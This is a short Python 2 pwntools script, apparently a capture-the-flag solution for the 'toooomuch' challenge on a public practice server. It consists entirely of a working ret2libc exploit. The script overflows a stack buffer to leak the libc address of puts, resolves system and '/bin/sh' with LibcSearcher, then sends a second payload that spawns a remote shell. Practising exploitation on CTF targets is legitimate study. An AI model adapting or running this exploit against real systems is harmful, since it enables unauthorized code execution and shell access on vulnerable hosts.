31 lines
861 B
Python
31 lines
861 B
Python
#!/usr/bin/env python2
|
|
from pwn import *
|
|
from LibcSearcher import *
|
|
import os
|
|
context.log_level = "debug"
|
|
context(arch = "i386",os = "linux")
|
|
|
|
p = remote("hackme.inndy.tw", 7702)
|
|
#p = process('./toooomuch')
|
|
elf = ELF('./toooomuch')
|
|
p.recvuntil("Give me your passcode: ")
|
|
|
|
puts_plt = elf.plt['puts']
|
|
puts_got = elf.got['puts']
|
|
toooomuch_func = elf.sym['toooomuch']
|
|
payload = 0x18*'z'+p32(0)+p32(puts_plt)+p32(toooomuch_func)+p32(puts_got)
|
|
p.sendline(payload)
|
|
p.recvuntil("You are not allowed here!\n")
|
|
puts_libc = u32(p.recv(4))
|
|
|
|
libc = LibcSearcher('puts', puts_libc)
|
|
libc_base = puts_libc - libc.dump('puts')
|
|
system_libc = libc_base + libc.dump('system')
|
|
binsh_libc = libc_base + libc.dump('str_bin_sh')
|
|
p.recvuntil("Give me your passcode: ")
|
|
|
|
payload = 0x18*'z'+p32(0)+p32(system_libc)+p32(toooomuch_func)+p32(binsh_libc)
|
|
p.sendline(payload)
|
|
|
|
p.interactive()
|